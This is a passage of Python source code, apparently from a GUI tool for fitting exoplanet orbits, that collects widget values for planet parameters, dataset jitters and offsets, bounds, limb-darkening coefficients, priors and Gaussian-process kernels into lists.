self.err_i9, self.err_Om9, \n ]\n return param_errors_gui\n\ndef use_param_gui(self):\n\n use_param_gui = [self.use_K1, self.use_P1, self.use_e1, self.use_om1, self.use_ma1, self.use_incl1, self.use_Omega1,\n self.use_K2, self.use_P2, self.use_e2, self.use_om2, self.use_ma2, self.use_incl2, self.use_Omega2,\n self.use_K3, self.use_P3, self.use_e3, self.use_om3, self.use_ma3, self.use_incl3, self.use_Omega3, \n self.use_K4, self.use_P4, self.use_e4, self.use_om4, self.use_ma4, self.use_incl4, self.use_Omega4, \n self.use_K5, self.use_P5, self.use_e5, self.use_om5, self.use_ma5, self.use_incl5, self.use_Omega5, \n self.use_K6, self.use_P6, self.use_e6, self.use_om6, self.use_ma6, self.use_incl6, self.use_Omega6, \n self.use_K7, self.use_P7, self.use_e7, self.use_om7, self.use_ma7, self.use_incl7, self.use_Omega7, \n self.use_K8, self.use_P8, self.use_e8, self.use_om8, self.use_ma8, self.use_incl8, self.use_Omega8, \n self.use_K9, self.use_P9, self.use_e9, self.use_om9, self.use_ma9, self.use_incl9, self.use_Omega9, \n ]\n return use_param_gui\n\n\n\n\n###########################################################################\n\n\n\ndef param_gui_wd(self):\n \n param_gui_wd = [\n self.om_dot_1, self.om_dot_2, self.om_dot_3, \n self.om_dot_4, self.om_dot_5, self.om_dot_6, \n self.om_dot_7, self.om_dot_8, self.om_dot_9\n ]\n return param_gui_wd\n\ndef use_param_gui_wd(self):\n\n use_param_gui_wd = [\n self.use_om_dot_1, self.use_om_dot_2, self.use_om_dot_3, \n self.use_om_dot_4, self.use_om_dot_5, self.use_om_dot_6, \n self.use_om_dot_7, self.use_om_dot_8, self.use_om_dot_9\n ]\n return use_param_gui_wd\n\ndef param_errors_gui_wd(self):\n\n param_errors_gui_wd = [\n self.err_om_dot_1,self.err_om_dot_2,self.err_om_dot_3,\n self.err_om_dot_4,self.err_om_dot_5,self.err_om_dot_6,\n self.err_om_dot_7,self.err_om_dot_8,self.err_om_dot_9,\n ]\n return param_errors_gui_wd\n\n###########################################################################\n\n\n\ndef param_gui_tr(self):\n \n param_gui_tr = [\n self.t0_1, self.pl_rad_1, 
self.a_sol_1,\n self.t0_2, self.pl_rad_2, self.a_sol_2,\n self.t0_3, self.pl_rad_3, self.a_sol_3,\n self.t0_4, self.pl_rad_4, self.a_sol_4, \n self.t0_5, self.pl_rad_5, self.a_sol_5,\n self.t0_6, self.pl_rad_6, self.a_sol_6,\n self.t0_7, self.pl_rad_7, self.a_sol_7, \n self.t0_8, self.pl_rad_8, self.a_sol_8,\n self.t0_9, self.pl_rad_9, self.a_sol_9,\n ]\n return param_gui_tr\n\n\n\ndef use_param_gui_tr(self):\n\n use_param_gui_tr = [self.use_t0_1, self.use_pl_rad_1, self.use_a_sol_1,\n self.use_t0_2, self.use_pl_rad_2, self.use_a_sol_2,\n self.use_t0_3, self.use_pl_rad_3, self.use_a_sol_3,\n self.use_t0_4, self.use_pl_rad_4, self.use_a_sol_4, \n self.use_t0_5, self.use_pl_rad_5, self.use_a_sol_5,\n self.use_t0_6, self.use_pl_rad_6, self.use_a_sol_6,\n self.use_t0_7, self.use_pl_rad_7, self.use_a_sol_7, \n self.use_t0_8, self.use_pl_rad_8, self.use_a_sol_8,\n self.use_t0_9, self.use_pl_rad_9, self.use_a_sol_9,\n ]\n\n\n return use_param_gui_tr\n\n###########################################################################\n\n\ndef rvs_data_gui(self):\n rvs_data_gui = [\n self.Data1,self.Data2,self.Data3,self.Data4,self.Data5,\n self.Data6,self.Data7,self.Data8,self.Data9,self.Data10\n ]\n return rvs_data_gui\n\n\n\ndef rvs_data_jitter_gui(self):\n rvs_data_jitter_gui = [\n self.jitter_Data1,self.jitter_Data2,self.jitter_Data3,self.jitter_Data4,self.jitter_Data5,\n self.jitter_Data6,self.jitter_Data7,self.jitter_Data8,self.jitter_Data9,self.jitter_Data10\n ]\n return rvs_data_jitter_gui\n\n\ndef use_data_offset_gui(self):\n\n use_data_offset_gui = [self.use_offset_Data1,self.use_offset_Data2,self.use_offset_Data3,self.use_offset_Data4,\n self.use_offset_Data5,self.use_offset_Data6,self.use_offset_Data7,self.use_offset_Data8,\n self.use_offset_Data9,self.use_offset_Data10]\n \n return use_data_offset_gui\n\n\ndef use_data_jitter_gui(self):\n\n use_data_jitter_gui = [self.use_jitter_Data1,self.use_jitter_Data2,self.use_jitter_Data3,self.use_jitter_Data4,self.use_jitter_Data5,\n self.use_jitter_Data6,self.use_jitter_Data7,self.use_jitter_Data8,self.use_jitter_Data9,self.use_jitter_Data10]\n \n return use_data_jitter_gui\n\n\ndef data_errors_gui(self):\n\n data_errors_gui = [\n self.err_Data1,self.err_Data2,self.err_Data3,self.err_Data4,self.err_Data5,\n self.err_Data6,self.err_Data7,self.err_Data8,self.err_Data9,self.err_Data10\n ]\n \n return data_errors_gui\n\n\ndef data_errors_jitter_gui(self):\n\n data_errors_jitter_gui = [\n self.err_jitter_Data1,self.err_jitter_Data2,self.err_jitter_Data3,self.err_jitter_Data4,self.err_jitter_Data5,\n self.err_jitter_Data6,self.err_jitter_Data7,self.err_jitter_Data8,self.err_jitter_Data9,self.err_jitter_Data10\n ]\n\n return data_errors_jitter_gui\n\n\ndef tra_data_gui(self):\n\n tra_data_gui = [\n self.trans_Data1,self.trans_Data2,self.trans_Data3,self.trans_Data4,self.trans_Data5,\n self.trans_Data6,self.trans_Data7,self.trans_Data8,self.trans_Data9,self.trans_Data10\n ]\n return tra_data_gui\n \ndef tra_data_jitter_gui(self):\n\n tra_data_jitter_gui = [\n self.jitter_trans_Data1,self.jitter_trans_Data2,self.jitter_trans_Data3,self.jitter_trans_Data4,self.jitter_trans_Data5,\n self.jitter_trans_Data6,self.jitter_trans_Data7,self.jitter_trans_Data8,self.jitter_trans_Data9,self.jitter_trans_Data10\n ]\n return tra_data_jitter_gui\n\n\ndef use_tra_data_offset_gui(self):\n\n use_tra_data_offset_gui = [\n self.use_offset_trans_Data1,self.use_offset_trans_Data2,self.use_offset_trans_Data3,self.use_offset_trans_Data4,\n 
self.use_offset_trans_Data5,self.use_offset_trans_Data6,self.use_offset_trans_Data7,self.use_offset_trans_Data8,\n self.use_offset_trans_Data9,self.use_offset_trans_Data10\n ]\n\n return use_tra_data_offset_gui\n\n\ndef use_tra_data_jitter_gui(self):\n \n use_tra_data_jitter_gui = [\n self.use_jitter_trans_Data1,self.use_jitter_trans_Data2,self.use_jitter_trans_Data3,self.use_jitter_trans_Data4,\n self.use_jitter_trans_Data5,self.use_jitter_trans_Data6,self.use_jitter_trans_Data7,self.use_jitter_trans_Data8,\n self.use_jitter_trans_Data9,self.use_jitter_trans_Data10\n ]\n \n return use_tra_data_jitter_gui\n\n\ndef tra_data_errors_gui(self):\n\n tra_data_errors_gui = [\n self.err_trans_Data1,self.err_trans_Data2,self.err_trans_Data3,self.err_trans_Data4,self.err_trans_Data5,\n self.err_trans_Data6,self.err_trans_Data7,self.err_trans_Data8,self.err_trans_Data9,self.err_trans_Data10\n ]\n \n return tra_data_errors_gui\n\ndef tra_data_errors_jitter_gui(self):\n\n tra_data_errors_jitter_gui = [\n self.err_jitter_trans_Data1,self.err_jitter_trans_Data2,self.err_jitter_trans_Data3,self.err_jitter_trans_Data4,\n self.err_jitter_trans_Data5,self.err_jitter_trans_Data6,self.err_jitter_trans_Data7,self.err_jitter_trans_Data8,\n self.err_jitter_trans_Data9,self.err_jitter_trans_Data10\n ]\n \n return tra_data_errors_jitter_gui\n\n\n\n\n\n\ndef param_bounds_gui(self):\n \n param_bounds_gui = [\n [self.K_min_1,self.K_max_1],[self.P_min_1,self.P_max_1], [self.e_min_1,self.e_max_1],[self.om_min_1,self.om_max_1], [self.ma_min_1,self.ma_max_1],[self.incl_min_1,self.incl_max_1], [self.Omega_min_1,self.Omega_max_1],[self.t0_min_1,self.t0_max_1],[self.pl_rad_min_1,self.pl_rad_max_1],[self.a_sol_min_1,self.a_sol_max_1],\n [self.K_min_2,self.K_max_2],[self.P_min_2,self.P_max_2], [self.e_min_2,self.e_max_2],[self.om_min_2,self.om_max_2], [self.ma_min_2,self.ma_max_2],[self.incl_min_2,self.incl_max_2], [self.Omega_min_2,self.Omega_max_2],[self.t0_min_2,self.t0_max_2],[self.pl_rad_min_2,self.pl_rad_max_2],[self.a_sol_min_2,self.a_sol_max_2],\n [self.K_min_3,self.K_max_3],[self.P_min_3,self.P_max_3], [self.e_min_3,self.e_max_3],[self.om_min_3,self.om_max_3], [self.ma_min_3,self.ma_max_3],[self.incl_min_3,self.incl_max_3], [self.Omega_min_3,self.Omega_max_3],[self.t0_min_3,self.t0_max_3],[self.pl_rad_min_3,self.pl_rad_max_3],[self.a_sol_min_3,self.a_sol_max_3],\n [self.K_min_4,self.K_max_4],[self.P_min_4,self.P_max_4], [self.e_min_4,self.e_max_4],[self.om_min_4,self.om_max_4], [self.ma_min_4,self.ma_max_4],[self.incl_min_4,self.incl_max_4], [self.Omega_min_4,self.Omega_max_4],[self.t0_min_4,self.t0_max_4],[self.pl_rad_min_4,self.pl_rad_max_4],[self.a_sol_min_4,self.a_sol_max_4],\n [self.K_min_5,self.K_max_5],[self.P_min_5,self.P_max_5], [self.e_min_5,self.e_max_5],[self.om_min_5,self.om_max_5], [self.ma_min_5,self.ma_max_5],[self.incl_min_5,self.incl_max_5], [self.Omega_min_5,self.Omega_max_5],[self.t0_min_5,self.t0_max_5],[self.pl_rad_min_5,self.pl_rad_max_5],[self.a_sol_min_5,self.a_sol_max_5],\n [self.K_min_6,self.K_max_6],[self.P_min_6,self.P_max_6], [self.e_min_6,self.e_max_6],[self.om_min_6,self.om_max_6], [self.ma_min_6,self.ma_max_6],[self.incl_min_6,self.incl_max_6], [self.Omega_min_6,self.Omega_max_6],[self.t0_min_6,self.t0_max_6],[self.pl_rad_min_6,self.pl_rad_max_6],[self.a_sol_min_6,self.a_sol_max_6],\n [self.K_min_7,self.K_max_7],[self.P_min_7,self.P_max_7], [self.e_min_7,self.e_max_7],[self.om_min_7,self.om_max_7], [self.ma_min_7,self.ma_max_7],[self.incl_min_7,self.incl_max_7], 
[self.Omega_min_7,self.Omega_max_7],[self.t0_min_7,self.t0_max_7],[self.pl_rad_min_7,self.pl_rad_max_7],[self.a_sol_min_7,self.a_sol_max_7],\n [self.K_min_8,self.K_max_8],[self.P_min_8,self.P_max_8], [self.e_min_8,self.e_max_8],[self.om_min_8,self.om_max_8], [self.ma_min_8,self.ma_max_8],[self.incl_min_8,self.incl_max_8], [self.Omega_min_8,self.Omega_max_8],[self.t0_min_8,self.t0_max_8],[self.pl_rad_min_8,self.pl_rad_max_8],[self.a_sol_min_8,self.a_sol_max_8],\n [self.K_min_9,self.K_max_9],[self.P_min_9,self.P_max_9], [self.e_min_9,self.e_max_9],[self.om_min_9,self.om_max_9], [self.ma_min_9,self.ma_max_9],[self.incl_min_9,self.incl_max_9], [self.Omega_min_9,self.Omega_max_9],[self.t0_min_9,self.t0_max_9],[self.pl_rad_min_9,self.pl_rad_max_9],[self.a_sol_min_9,self.a_sol_max_9] \n ]\n \n return param_bounds_gui\n\n\n\n\ndef offset_bounds_gui(self):\n \n offset_bounds_gui = [\n [self.Data1_min,self.Data1_max], [self.Data2_min,self.Data2_max], [self.Data3_min,self.Data3_max], [self.Data4_min,self.Data4_max], [self.Data5_min,self.Data5_max], \n [self.Data6_min,self.Data6_max], [self.Data7_min,self.Data7_max], [self.Data8_min,self.Data8_max], [self.Data9_min,self.Data9_max], [self.Data10_min,self.Data10_max]\n ]\n \n return offset_bounds_gui\n \n\n\ndef jitter_bounds_gui(self): \n \n jitter_bounds_gui = [\n [self.jitter1_min,self.jitter1_max], [self.jitter2_min,self.jitter2_max], [self.jitter3_min,self.jitter3_max], [self.jitter4_min,self.jitter4_max], [self.jitter5_min,self.jitter5_max], \n [self.jitter6_min,self.jitter6_max], [self.jitter7_min,self.jitter7_max], [self.jitter8_min,self.jitter8_max], [self.jitter9_min,self.jitter9_max], [self.jitter10_min,self.Data10_max] \n ] \n \n return jitter_bounds_gui\n\n\n################### OmDot ########################\n\ndef om_dot_bounds_gui(self):\n\n om_dot_bounds_gui = [\n [self.omega_dot_min_1,self.omega_dot_max_1], [self.omega_dot_min_2,self.omega_dot_max_2], \n [self.omega_dot_min_3,self.omega_dot_max_3], [self.omega_dot_min_4,self.omega_dot_max_4], \n [self.omega_dot_min_5,self.omega_dot_max_5], [self.omega_dot_min_6,self.omega_dot_max_6], \n [self.omega_dot_min_7,self.omega_dot_max_7], [self.omega_dot_min_8,self.omega_dot_max_8], \n [self.omega_dot_min_9,self.omega_dot_max_9] \n ] \n return om_dot_bounds_gui\n\n\n################### LD ########################\n\ndef use_uni_ld_models(self):\n\n use_uni_ld_models = [\n self.use_uniform_ld_1,self.use_uniform_ld_2,self.use_uniform_ld_3,self.use_uniform_ld_4,self.use_uniform_ld_5,\n self.use_uniform_ld_6,self.use_uniform_ld_7,self.use_uniform_ld_8,self.use_uniform_ld_9,self.use_uniform_ld_10\n ]\n return use_uni_ld_models\n\n\ndef use_lin_ld_models(self):\n\n use_lin_ld_models = [\n self.use_linear_ld_1,self.use_linear_ld_2,self.use_linear_ld_3,self.use_linear_ld_4,self.use_linear_ld_5,\n self.use_linear_ld_6,self.use_linear_ld_7,self.use_linear_ld_8,self.use_linear_ld_9,self.use_linear_ld_10\n ]\n return use_lin_ld_models\n\n\ndef use_quad_ld_models(self):\n \n use_quad_ld_models =[\n self.use_quadratic_ld_1,self.use_quadratic_ld_2,self.use_quadratic_ld_3,self.use_quadratic_ld_4,self.use_quadratic_ld_5,\n self.use_quadratic_ld_6,self.use_quadratic_ld_7,self.use_quadratic_ld_8,self.use_quadratic_ld_9,self.use_quadratic_ld_10\n ] \n return use_quad_ld_models\n\n\ndef use_nonlin_ld_models(self):\n \n use_nonlin_ld_models = [\n self.use_nonlinear_ld_1,self.use_nonlinear_ld_2,self.use_nonlinear_ld_3,self.use_nonlinear_ld_4,self.use_nonlinear_ld_5,\n 
self.use_nonlinear_ld_6,self.use_nonlinear_ld_7,self.use_nonlinear_ld_8,self.use_nonlinear_ld_9,self.use_nonlinear_ld_10\n ] \n return use_nonlin_ld_models\n\n\ndef lin_u(self):\n\n lin_u = [self.u1_linear_1,self.u1_linear_2,self.u1_linear_3,self.u1_linear_4,self.u1_linear_5,\n self.u1_linear_6,self.u1_linear_7,self.u1_linear_8,self.u1_linear_9,self.u1_linear_10\n ]\n return lin_u\n\ndef use_lin_u(self):\n\n use_lin_u = [\n self.use_u1_linear_1,self.use_u1_linear_2,self.use_u1_linear_3,self.use_u1_linear_4,self.use_u1_linear_5,\n self.use_u1_linear_6,self.use_u1_linear_7,self.use_u1_linear_8,self.use_u1_linear_9,self.use_u1_linear_10\n ]\n return use_lin_u\n\n\ndef quad_u1(self):\n\n quad_u1 = [\n self.u1_quadratic_1,self.u1_quadratic_2,self.u1_quadratic_3,self.u1_quadratic_4,self.u1_quadratic_5,\n self.u1_quadratic_6,self.u1_quadratic_7,self.u1_quadratic_8,self.u1_quadratic_9,self.u1_quadratic_10\n ]\n return quad_u1\n\ndef use_quad_u1(self):\n\n use_quad_u1 = [\n self.use_u1_quadratic_1,self.use_u1_quadratic_2,self.use_u1_quadratic_3,self.use_u1_quadratic_4,self.use_u1_quadratic_5,\n self.use_u1_quadratic_6,self.use_u1_quadratic_7,self.use_u1_quadratic_8,self.use_u1_quadratic_9,self.use_u1_quadratic_10\n ]\n return use_quad_u1\n\ndef quad_u2(self):\n\n quad_u2 = [\n self.u2_quadratic_1,self.u2_quadratic_2,self.u2_quadratic_3,self.u2_quadratic_4,self.u2_quadratic_5,\n self.u2_quadratic_6,self.u2_quadratic_7,self.u2_quadratic_8,self.u2_quadratic_9,self.u2_quadratic_10\n ]\n return quad_u2\n\ndef use_quad_u2(self):\n\n use_quad_u2 = [\n self.use_u2_quadratic_1,self.use_u2_quadratic_2,self.use_u2_quadratic_3,self.use_u2_quadratic_4,self.use_u2_quadratic_5,\n self.use_u2_quadratic_6,self.use_u2_quadratic_7,self.use_u2_quadratic_8,self.use_u2_quadratic_9,self.use_u2_quadratic_10\n ]\n return use_quad_u2\n \n\n\ndef nonlin_u1(self):\n\n nonlin_u1 = [\n self.u1_nonlin_1,self.u1_nonlin_2,self.u1_nonlin_3,self.u1_nonlin_4,self.u1_nonlin_5,\n self.u1_nonlin_6,self.u1_nonlin_7,self.u1_nonlin_8,self.u1_nonlin_9,self.u1_nonlin_10\n ]\n return nonlin_u1\n\ndef use_nonlin_u1(self):\n\n use_nonlin_u1 = [\n self.use_u1_nonlin_1,self.use_u1_nonlin_2,self.use_u1_nonlin_3,self.use_u1_nonlin_4,self.use_u1_nonlin_5,\n self.use_u1_nonlin_6,self.use_u1_nonlin_7,self.use_u1_nonlin_8,self.use_u1_nonlin_9,self.use_u1_nonlin_10\n ]\n return use_nonlin_u1\n\n\ndef nonlin_u2(self):\n\n nonlin_u2 = [\n self.u2_nonlin_1,self.u2_nonlin_2,self.u2_nonlin_3,self.u2_nonlin_4,self.u2_nonlin_5,\n self.u2_nonlin_6,self.u2_nonlin_7,self.u2_nonlin_8,self.u2_nonlin_9,self.u2_nonlin_10\n ]\n return nonlin_u2\n\ndef use_nonlin_u2(self):\n\n use_nonlin_u2 = [\n self.use_u2_nonlin_1,self.use_u2_nonlin_2,self.use_u2_nonlin_3,self.use_u2_nonlin_4,self.use_u2_nonlin_5,\n self.use_u2_nonlin_6,self.use_u2_nonlin_7,self.use_u2_nonlin_8,self.use_u2_nonlin_9,self.use_u2_nonlin_10\n ]\n return use_nonlin_u2\n\n\ndef nonlin_u3(self):\n\n nonlin_u3 = [\n self.u3_nonlin_1,self.u3_nonlin_2,self.u3_nonlin_3,self.u3_nonlin_4,self.u3_nonlin_5,\n self.u3_nonlin_6,self.u3_nonlin_7,self.u3_nonlin_8,self.u3_nonlin_9,self.u3_nonlin_10\n ]\n return nonlin_u3\n\ndef use_nonlin_u3(self):\n\n use_nonlin_u3 = [\n self.use_u3_nonlin_1,self.use_u3_nonlin_2,self.use_u3_nonlin_3,self.use_u3_nonlin_4,self.use_u3_nonlin_5,\n self.use_u3_nonlin_6,self.use_u3_nonlin_7,self.use_u3_nonlin_8,self.use_u3_nonlin_9,self.use_u3_nonlin_10\n ]\n return use_nonlin_u3\n\ndef nonlin_u4(self):\n\n nonlin_u4 = [\n 
self.u4_nonlin_1,self.u4_nonlin_2,self.u4_nonlin_3,self.u4_nonlin_4,self.u4_nonlin_5,\n self.u4_nonlin_6,self.u4_nonlin_7,self.u4_nonlin_8,self.u4_nonlin_9,self.u4_nonlin_10\n ]\n return nonlin_u4\n\ndef use_nonlin_u4(self):\n\n use_nonlin_u4 = [\n self.use_u4_nonlin_1,self.use_u4_nonlin_2,self.use_u4_nonlin_3,self.use_u4_nonlin_4,self.use_u4_nonlin_5,\n self.use_u4_nonlin_6,self.use_u4_nonlin_7,self.use_u4_nonlin_8,self.use_u4_nonlin_9,self.use_u4_nonlin_10\n ]\n return use_nonlin_u4\n\n################# Normal Prior ################\n \n\n\ndef param_nr_priors_gui(self):\n \n param_nr_priors_gui = [\n [self.K_mean_1.value(),self.K_sigma_1.value(),self.use_K_norm_pr_1.isChecked()],[self.P_mean_1.value(),self.P_sigma_1.value(),self.use_P_norm_pr_1.isChecked()], [self.e_mean_1.value(),self.e_sigma_1.value(),self.use_e_norm_pr_1.isChecked()],[self.om_mean_1.value(),self.om_sigma_1.value(),self.use_om_norm_pr_1.isChecked()], [self.ma_mean_1.value(),self.ma_sigma_1.value(),self.use_ma_norm_pr_1.isChecked()],[self.incl_mean_1.value(),self.incl_sigma_1.value(),self.use_incl_norm_pr_1.isChecked()], [self.Omega_mean_1.value(),self.Omega_sigma_1.value(), self.use_Omega_norm_pr_1.isChecked()],[self.t0_mean_1.value(),self.t0_sigma_1.value(), self.use_t0_norm_pr_1.isChecked()],[self.pl_rad_mean_1.value(),self.pl_rad_sigma_1.value(),self.use_pl_rad_norm_pr_1.isChecked()],[self.a_sol_mean_1.value(),self.a_sol_sigma_1.value(),self.use_a_sol_norm_pr_1.isChecked()],\n [self.K_mean_2.value(),self.K_sigma_2.value(),self.use_K_norm_pr_2.isChecked()],[self.P_mean_2.value(),self.P_sigma_2.value(),self.use_P_norm_pr_2.isChecked()], [self.e_mean_2.value(),self.e_sigma_2.value(),self.use_e_norm_pr_2.isChecked()],[self.om_mean_2.value(),self.om_sigma_2.value(),self.use_om_norm_pr_2.isChecked()], [self.ma_mean_2.value(),self.ma_sigma_2.value(),self.use_ma_norm_pr_2.isChecked()],[self.incl_mean_2.value(),self.incl_sigma_2.value(),self.use_incl_norm_pr_2.isChecked()], [self.Omega_mean_2.value(),self.Omega_sigma_2.value(), self.use_Omega_norm_pr_2.isChecked()],[self.t0_mean_2.value(),self.t0_sigma_2.value(), self.use_t0_norm_pr_2.isChecked()],[self.pl_rad_mean_2.value(),self.pl_rad_sigma_2.value(),self.use_pl_rad_norm_pr_2.isChecked()],[self.a_sol_mean_2.value(),self.a_sol_sigma_2.value(),self.use_a_sol_norm_pr_2.isChecked()],\n [self.K_mean_3.value(),self.K_sigma_3.value(),self.use_K_norm_pr_3.isChecked()],[self.P_mean_3.value(),self.P_sigma_3.value(),self.use_P_norm_pr_3.isChecked()], [self.e_mean_3.value(),self.e_sigma_3.value(),self.use_e_norm_pr_3.isChecked()],[self.om_mean_3.value(),self.om_sigma_3.value(),self.use_om_norm_pr_3.isChecked()], [self.ma_mean_3.value(),self.ma_sigma_3.value(),self.use_ma_norm_pr_3.isChecked()],[self.incl_mean_3.value(),self.incl_sigma_3.value(),self.use_incl_norm_pr_3.isChecked()], [self.Omega_mean_3.value(),self.Omega_sigma_3.value(), self.use_Omega_norm_pr_3.isChecked()],[self.t0_mean_3.value(),self.t0_sigma_3.value(), self.use_t0_norm_pr_3.isChecked()],[self.pl_rad_mean_3.value(),self.pl_rad_sigma_3.value(),self.use_pl_rad_norm_pr_3.isChecked()],[self.a_sol_mean_3.value(),self.a_sol_sigma_3.value(),self.use_a_sol_norm_pr_3.isChecked()],\n [self.K_mean_4.value(),self.K_sigma_4.value(),self.use_K_norm_pr_4.isChecked()],[self.P_mean_4.value(),self.P_sigma_4.value(),self.use_P_norm_pr_4.isChecked()], [self.e_mean_4.value(),self.e_sigma_4.value(),self.use_e_norm_pr_4.isChecked()],[self.om_mean_4.value(),self.om_sigma_4.value(),self.use_om_norm_pr_4.isChecked()], 
[self.ma_mean_4.value(),self.ma_sigma_4.value(),self.use_ma_norm_pr_4.isChecked()],[self.incl_mean_4.value(),self.incl_sigma_4.value(),self.use_incl_norm_pr_4.isChecked()], [self.Omega_mean_4.value(),self.Omega_sigma_4.value(), self.use_Omega_norm_pr_4.isChecked()],[self.t0_mean_4.value(),self.t0_sigma_4.value(), self.use_t0_norm_pr_4.isChecked()],[self.pl_rad_mean_4.value(),self.pl_rad_sigma_4.value(),self.use_pl_rad_norm_pr_4.isChecked()],[self.a_sol_mean_4.value(),self.a_sol_sigma_4.value(),self.use_a_sol_norm_pr_4.isChecked()],\n [self.K_mean_5.value(),self.K_sigma_5.value(),self.use_K_norm_pr_5.isChecked()],[self.P_mean_5.value(),self.P_sigma_5.value(),self.use_P_norm_pr_5.isChecked()], [self.e_mean_5.value(),self.e_sigma_5.value(),self.use_e_norm_pr_5.isChecked()],[self.om_mean_5.value(),self.om_sigma_5.value(),self.use_om_norm_pr_5.isChecked()], [self.ma_mean_5.value(),self.ma_sigma_5.value(),self.use_ma_norm_pr_5.isChecked()],[self.incl_mean_5.value(),self.incl_sigma_5.value(),self.use_incl_norm_pr_5.isChecked()], [self.Omega_mean_5.value(),self.Omega_sigma_5.value(), self.use_Omega_norm_pr_5.isChecked()],[self.t0_mean_5.value(),self.t0_sigma_5.value(), self.use_t0_norm_pr_5.isChecked()],[self.pl_rad_mean_5.value(),self.pl_rad_sigma_5.value(),self.use_pl_rad_norm_pr_5.isChecked()],[self.a_sol_mean_5.value(),self.a_sol_sigma_5.value(),self.use_a_sol_norm_pr_5.isChecked()],\n [self.K_mean_6.value(),self.K_sigma_6.value(),self.use_K_norm_pr_6.isChecked()],[self.P_mean_6.value(),self.P_sigma_6.value(),self.use_P_norm_pr_6.isChecked()], [self.e_mean_6.value(),self.e_sigma_6.value(),self.use_e_norm_pr_6.isChecked()],[self.om_mean_6.value(),self.om_sigma_6.value(),self.use_om_norm_pr_6.isChecked()], [self.ma_mean_6.value(),self.ma_sigma_6.value(),self.use_ma_norm_pr_6.isChecked()],[self.incl_mean_6.value(),self.incl_sigma_6.value(),self.use_incl_norm_pr_6.isChecked()], [self.Omega_mean_6.value(),self.Omega_sigma_6.value(), self.use_Omega_norm_pr_6.isChecked()],[self.t0_mean_6.value(),self.t0_sigma_6.value(), self.use_t0_norm_pr_6.isChecked()],[self.pl_rad_mean_6.value(),self.pl_rad_sigma_6.value(),self.use_pl_rad_norm_pr_6.isChecked()],[self.a_sol_mean_6.value(),self.a_sol_sigma_6.value(),self.use_a_sol_norm_pr_6.isChecked()],\n [self.K_mean_7.value(),self.K_sigma_7.value(),self.use_K_norm_pr_7.isChecked()],[self.P_mean_7.value(),self.P_sigma_7.value(),self.use_P_norm_pr_7.isChecked()], [self.e_mean_7.value(),self.e_sigma_7.value(),self.use_e_norm_pr_7.isChecked()],[self.om_mean_7.value(),self.om_sigma_7.value(),self.use_om_norm_pr_7.isChecked()], [self.ma_mean_7.value(),self.ma_sigma_7.value(),self.use_ma_norm_pr_7.isChecked()],[self.incl_mean_7.value(),self.incl_sigma_7.value(),self.use_incl_norm_pr_7.isChecked()], [self.Omega_mean_7.value(),self.Omega_sigma_7.value(), self.use_Omega_norm_pr_7.isChecked()],[self.t0_mean_7.value(),self.t0_sigma_7.value(), self.use_t0_norm_pr_7.isChecked()],[self.pl_rad_mean_7.value(),self.pl_rad_sigma_7.value(),self.use_pl_rad_norm_pr_7.isChecked()],[self.a_sol_mean_7.value(),self.a_sol_sigma_7.value(),self.use_a_sol_norm_pr_7.isChecked()],\n [self.K_mean_8.value(),self.K_sigma_8.value(),self.use_K_norm_pr_8.isChecked()],[self.P_mean_8.value(),self.P_sigma_8.value(),self.use_P_norm_pr_8.isChecked()], [self.e_mean_8.value(),self.e_sigma_8.value(),self.use_e_norm_pr_8.isChecked()],[self.om_mean_8.value(),self.om_sigma_8.value(),self.use_om_norm_pr_8.isChecked()], 
[self.ma_mean_8.value(),self.ma_sigma_8.value(),self.use_ma_norm_pr_8.isChecked()],[self.incl_mean_8.value(),self.incl_sigma_8.value(),self.use_incl_norm_pr_8.isChecked()], [self.Omega_mean_8.value(),self.Omega_sigma_8.value(), self.use_Omega_norm_pr_8.isChecked()],[self.t0_mean_8.value(),self.t0_sigma_8.value(), self.use_t0_norm_pr_8.isChecked()],[self.pl_rad_mean_8.value(),self.pl_rad_sigma_8.value(),self.use_pl_rad_norm_pr_8.isChecked()],[self.a_sol_mean_8.value(),self.a_sol_sigma_8.value(),self.use_a_sol_norm_pr_8.isChecked()],\n [self.K_mean_9.value(),self.K_sigma_9.value(),self.use_K_norm_pr_9.isChecked()],[self.P_mean_9.value(),self.P_sigma_9.value(),self.use_P_norm_pr_9.isChecked()], [self.e_mean_9.value(),self.e_sigma_9.value(),self.use_e_norm_pr_9.isChecked()],[self.om_mean_9.value(),self.om_sigma_9.value(),self.use_om_norm_pr_9.isChecked()], [self.ma_mean_9.value(),self.ma_sigma_9.value(),self.use_ma_norm_pr_9.isChecked()],[self.incl_mean_9.value(),self.incl_sigma_9.value(),self.use_incl_norm_pr_9.isChecked()], [self.Omega_mean_9.value(),self.Omega_sigma_9.value(), self.use_Omega_norm_pr_9.isChecked()],[self.t0_mean_9.value(),self.t0_sigma_9.value(), self.use_t0_norm_pr_9.isChecked()],[self.pl_rad_mean_9.value(),self.pl_rad_sigma_9.value(),self.use_pl_rad_norm_pr_9.isChecked()],[self.a_sol_mean_9.value(),self.a_sol_sigma_9.value(),self.use_a_sol_norm_pr_9.isChecked()],\n ]\n return param_nr_priors_gui\n\n \n################### GP ########################\n\ndef gp_rot_params(self):\n\n gp_rot_params = [\n self.GP_rot_kernel_Amp,\n self.GP_rot_kernel_time_sc,\n self.GP_rot_kernel_Per,\n self.GP_rot_kernel_fact\n ]\n\n return gp_rot_params\n\ndef gp_rot_errors_gui(self):\n\n gp_rot_errors_gui = [\n self.err_rot_kernel_Amp,\n self.err_rot_kernel_time_sc,\n self.err_rot_kernel_Per,\n self.err_rot_kernel_fact\n ]\n \n return gp_rot_errors_gui\n\ndef use_gp_rot_params(self):\n use_gp_rot_params = [\n self.use_GP_rot_kernel_Amp,\n self.use_GP_rot_kernel_time_sc,\n self.use_GP_rot_kernel_Per,\n self.use_GP_rot_kernel_fact\n ]\n return use_gp_rot_params\n\n\ndef gp_sho_params(self):\n\n gp_sho_params = [\n self.GP_sho_kernel_S,\n self.GP_sho_kernel_Q,\n self.GP_sho_kernel_omega\n ]\n\n return gp_sho_params\n\ndef use_gp_sho_params(self):\n\n use_gp_sho_params = [\n self.use_GP_sho_kernel_S,\n self.use_GP_sho_kernel_Q,\n self.use_GP_sho_kernel_omega\n ]\n return use_gp_sho_params\n\n\ndef gp_sho_errors_gui(self):\n\n gp_sho_errors_gui = [\n self.err_sho_kernel_S,\n self.err_sho_kernel_Q,\n self.err_sho_kernel_omega\n ]\n \n return gp_sho_errors_gui\n\n\n\ndef tra_gp_rot_params(self):\n\n tra_gp_rot_params = [\n self.tra_GP_rot_kernel_Amp,\n self.tra_GP_rot_kernel_time_sc,\n self.tra_GP_rot_kernel_Per,\n self.tra_GP_rot_kernel_fact]\n\n return tra_gp_rot_params\n\n\ndef 